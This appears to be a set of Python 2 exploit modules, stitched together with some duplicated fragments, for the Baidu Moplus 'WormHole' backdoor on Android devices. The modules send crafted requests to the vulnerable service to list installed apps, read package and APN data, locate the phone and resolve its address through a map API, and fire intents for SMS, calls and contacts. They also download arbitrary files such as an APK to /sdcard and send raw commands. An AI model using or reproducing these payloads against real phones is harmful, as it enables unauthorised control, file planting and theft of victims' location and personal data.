获取安装程序列表
''',
}
payload = "getapplist?mcmdf=inapp_&callback=t"
options = AttribDict()
def callback(self, arg):
_, res = arg
if _:
self.ui.notify.success('Get success!')
# parse json
try:
data = json.loads(res[7:-2])
packages = data['package_infos']
self.ui.table(
'Found (%d) app..' % len(packages),
[45, 31],
['PACKAGE_NAME', 'VERSION_NAME'],
[[p['package_name'], p['version_name']] for p in packages]
)
cache.getapplist = [p['package_name'] for p in packages]
except Exception, e:
self.ui.notify.error('(PARSE JSON) -> %s' % e)
else:
self.ui.notify.error('Get fail (%s)!' % res)
register(GetApplist)
set URL http://xxx.com/a.apk
set SAVE_PATH downloads/
就会把 xxx.com/a.apk 文件下载到 /sdcard/downloads/ 目录下
''',
}
payload = "downloadfile?querydown=download&downloadurl={self.options.URL}&savepath" \
"={self.options.SAVE_PATH}&filesize=1024&callback=t&mcmdf=inapp_"
options = AttribDict()
options.URL = ['http://', 'https://', 'ftp://', 'file://']
options.SAVE_PATH = "."
def callback(self, arg):
_, res = arg
if _:
if res == 't && t({"error":0});':
self.ui.notify.success('Download success!').info(
'Save in /sdcard/%s%s' %
(self.options.SAVE_PATH, self.options.URL.split('/')[-1]))
else:
self.ui.notify.error('Download fail (%s)!' % res)
else:
self.ui.notify.error('Download fail (%s)!' % res)
register(DownloadFile)
PACKAGENAME:
要获取的包名
eg: set PACKAGENAME com.android.browser
""",
}
payload = "getpackageinfo?packagename={self.options.PACKAGENAME}&mcmdf=inapp_&callback=t"
options = AttribDict()
options.PACKAGENAME = cache.getapplist if cache.has_key("getapplist") else []
def callback(self, arg):
_, res = arg
if _:
info = json.loads(res[7:-2])
if len(info) > 0:
self.ui.notify.info("Get success!").table(
"App Info...",
[21, 21],
["Options", "Info"],
[[p, info.get("package_infos")[0].get(p)] for p in info.get("package_infos")[0].keys()],
)
else:
self.ui.notify.error("Get fail (%s)!" % res)
else:
self.ui.notify.error("Get fail (%s)!" % res)
register(PackageInfo)
ui = UI()
info = {
"Author": "Medici.Yan",
"Description": u'''
获取本地字符串
''',
}
payload = "getlocstring?mcmdf=inapp_&callback=t"
options = AttribDict()
def callback(self, arg):
_, res = arg
print arg
if _:
data = json.loads(res[7:-2])
if len(data) > 0:
self.ui.notify.info('Get success!').success(
data.get('locstring'))
else:
self.ui.notify.error('Get fail (%s)!' % res)
else:
self.ui.notify.error('Get fail (%s)!' % res)
register(Getlocstring)
PACKAGENAME:
要获取的包名
eg: set PACKAGENAME com.android.browser
''',
}
payload = "getpackageinfo?packagename={self.options.PACKAGENAME}&mcmdf=inapp_&callback=t"
options = AttribDict()
options.PACKAGENAME = cache.getapplist if cache.has_key('getapplist') else []
def callback(self, arg):
_, res = arg
if _:
info = json.loads(res[7:-2])
if len(info) > 0:
self.ui.notify.info('Get success!').table(
'App Info...',
[21, 21],
['Options', 'Info'],
[[p, info.get('package_infos')[0].get(p)] for p in info.get('package_infos')[0].keys()]
)
else:
self.ui.notify.error('Get fail (%s)!' % res)
else:
self.ui.notify.error('Get fail (%s)!' % res)
register(PackageInfo)
set SAVE_PATH downloads/
就会把 xxx.com/a.apk 文件下载到 /sdcard/downloads/ 目录下
""",
}
payload = (
"downloadfile?querydown=download&downloadurl={self.options.URL}&savepath"
"={self.options.SAVE_PATH}&filesize=1024&callback=t&mcmdf=inapp_"
)
options = AttribDict()
options.URL = ["http://", "https://", "ftp://", "file://"]
options.SAVE_PATH = "."
def callback(self, arg):
_, res = arg
if _:
if res == 't && t({"error":0});':
self.ui.notify.success("Download success!").info(
"Save in /sdcard/%s%s" % (self.options.SAVE_PATH, self.options.URL.split("/")[-1])
)
else:
self.ui.notify.error("Download fail (%s)!" % res)
else:
self.ui.notify.error("Download fail (%s)!" % res)
register(DownloadFile)
try:
data = json.loads(data)
self.ui.notify.info('Get success!')
if data.has_key('coords'):
info = data['coords']
# print ([p, info.get(p)] for p in info.keys())
self.ui.table(u'目标地理位置', [20, 21], ['Options', 'Info'], [
[u'citycode', data['citycode']],
[u'longitude', info['longitude']],
[u'latitude', info['latitude']],
[u'accuracy', info['accuracy']],
])
location_api = "http://api.map.baidu.com/?qt=rgc&x={longitude}&y={latitude}&" \
"dis_poi=1&fromproduct=jsapi&res=api".format(
longitude=info['longitude'], latitude=info["latitude"]
)
req = urllib2.Request(location_api)
resp = urllib2.urlopen(req)
lodata = json.loads(resp.read())
if lodata:
self.ui.success(lodata["content"]["address"]).success(
lodata["content"]["poi_desc"])
except:
self.ui.error('Error!')
else:
self.ui.error('Error!')
register(Geolocation)
def __init__(self):
pass
ui = UI()
info = {
"Author": "Medici.Yan",
"Description": u'''
发送原始字串注意拼接字符串
set RAW sendintent?intent=sms:110&
payload = "{self.options.RAW}mcmdf=inapp_&callback=t"
''',
}
payload = "{self.options.RAW}mcmdf=inapp_&callback=t"
options = AttribDict()
options.RAW = ""
def callback(self, arg):
if arg[0]:
self.ui.success('Success!')
else:
self.ui.error('Error!')
self.ui.p(arg[1], self.ui.GREEN)
register(RawReq)
# coding:utf-8
from libs.core.register import register
from libs.core.attrdict import AttribDict
from libs.ui import UI
class GetApn():
ui = UI()
info = {
"Author":"Medici.Yan",
"Description": u'''
获取 apn
''',
}
payload = "getapn?mcmdf=inapp_&callback=t"
options = AttribDict()
def callback(self, arg):
if arg[0]:
self.ui.notify.info('Get success!').success(arg[1][8:-13])
else:
self.ui.error('Error!')
register(GetApn)
self.ui.notify.info('Get success!')
if data.has_key('coords'):
info = data['coords']
# print ([p, info.get(p)] for p in info.keys())
self.ui.table(
u'目标地理位置',
[20, 21],
['Options', 'Info'],
[
[u'citycode', data['citycode']],
[u'longitude', info['longitude']],
[u'latitude', info['latitude']],
[u'accuracy', info['accuracy']],
])
location_api = "http://api.map.baidu.com/?qt=rgc&x={longitude}&y={latitude}&" \
"dis_poi=1&fromproduct=jsapi&res=api".format(
longitude=info['longitude'], latitude=info["latitude"]
)
req = urllib2.Request(location_api)
resp = urllib2.urlopen(req)
lodata = json.loads(resp.read())
if lodata:
self.ui.success(lodata["content"]["address"]).success(lodata["content"]["poi_desc"])
except:
self.ui.error('Error!')
else:
self.ui.error('Error!')
register(Geolocation)
def callback(self, arg):
_, res = arg
if _:
info = json.loads(res[7:-2])
if len(info) > 0:
info_keys = info.keys()
info_keys.remove('error')
data = info.get(info_keys[0])
self.ui.notify.info('Get success!')
if hasattr(data, '__iter__'):
if self.options.INFOTYPE == "getapplist":
self.ui.table(
'Found (%d) app..' % len(data),
[45, 31],
['PACKAGE_NAME', 'VERSION_NAME'],
[[p['package_name'], p['version_name']] for p in data]
)
cache.getapplist = [p['package_name'] for p in data]
else:
self.ui.success(info.get(info_keys[0]))
else:
self.ui.notify.error('Get fail (%s)!' % res)
else:
self.ui.notify.error('Get fail (%s)!' % res)
register(GetInfo)
ui = UI()
info = {
"Author": "Medici.Yan",
"Description": u'''
获取本地字符串
''',
}
payload = "getlocstring?mcmdf=inapp_&callback=t"
options = AttribDict()
def callback(self, arg):
_, res = arg
print arg
if _:
data = json.loads(res[7:-2])
if len(data) > 0:
self.ui.notify.info('Get success!').success(data.get('locstring'))
else:
self.ui.notify.error('Get fail (%s)!' % res)
else:
self.ui.notify.error('Get fail (%s)!' % res)
register(Getlocstring)
"Description": u'''
获取安装程序列表
''',
}
payload = "getapplist?mcmdf=inapp_&callback=t"
options = AttribDict()
def callback(self, arg):
_, res = arg
if _:
self.ui.notify.success('Get success!')
# parse json
try:
data = json.loads(res[7:-2])
packages = data['package_infos']
self.ui.table('Found (%d) app..' % len(packages), [45, 31],
['PACKAGE_NAME', 'VERSION_NAME'],
[[p['package_name'], p['version_name']]
for p in packages])
cache.getapplist = [p['package_name'] for p in packages]
except Exception, e:
self.ui.notify.error('(PARSE JSON) -> %s' % e)
else:
self.ui.notify.error('Get fail (%s)!' % res)
register(GetApplist)
file:// 打开本地文件
mailto: 发送邮件
content://contacts/people/1 查看编号为 1 的用户名片
其它的自行补充
''',
}
payload = "sendintent?intent={self.options.INTENT}&mcmdf=inapp_&callback=t"
options = AttribDict()
options.INTENT = [
'sms:',
'tel:',
'geo:',
'smsto:',
'http://',
'file://',
'mailto:',
'content://contacts/people/',
]
def callback(self, arg):
if arg[0]:
self.ui.success('Success!')
else:
self.ui.error('Error!')
register(SendIntent)
其它的自行补充
''',
}
payload = "sendintent?intent={self.options.INTENT}&mcmdf=inapp_&callback=t"
options = AttribDict()
options.INTENT = [
'sms:',
'tel:',
'geo:',
'smsto:',
'http://',
'file://',
'mailto:',
'weixin://',
'content://contacts/people/',
'market://details?id=',
'market://search?q=',
]
def callback(self, arg):
if arg[0]:
self.ui.success('Success!')
else:
self.ui.error('Error!')
register(SendIntent)
# coding:utf-8
from libs.core.register import register
from libs.core.attrdict import AttribDict
from libs.ui import UI
class Check():
ui = UI()
# 关于这个 Poc 的一些信息
info = {
"Author":"Medici.Yan",
"Description": u'''
检查 moplus WormHole
''',
}
# 要发送的 payload
payload = "getserviceinfo?mcmdf=inapp_&callback=t"
# options 是要手动设置的参数
options = AttribDict()
def callback(self, arg):
'''回调函数'''
_, msg = arg
if _ and 'packagename":"com.baidu.' in msg:
self.ui.notify.success('Target is vulnerable!')
else:
self.ui.notify.error('Target is not vulnerable!')
# 注册
register(Check)
from libs.core.attrdict import AttribDict
from libs.ui import UI
class Check():
ui = UI()
# 关于这个 Poc 的一些信息
info = {
"Author": "Medici.Yan",
"Description": u'''
检查 moplus WormHole
''',
}
# 要发送的 payload
payload = "getserviceinfo?mcmdf=inapp_&callback=t"
# options 是要手动设置的参数
options = AttribDict()
def callback(self, arg):
'''回调函数'''
_, msg = arg
if _ and 'packagename":"com.baidu.' in msg:
self.ui.notify.success('Target is vulnerable!')
else:
self.ui.notify.error('Target is not vulnerable!')
# 注册
register(Check)
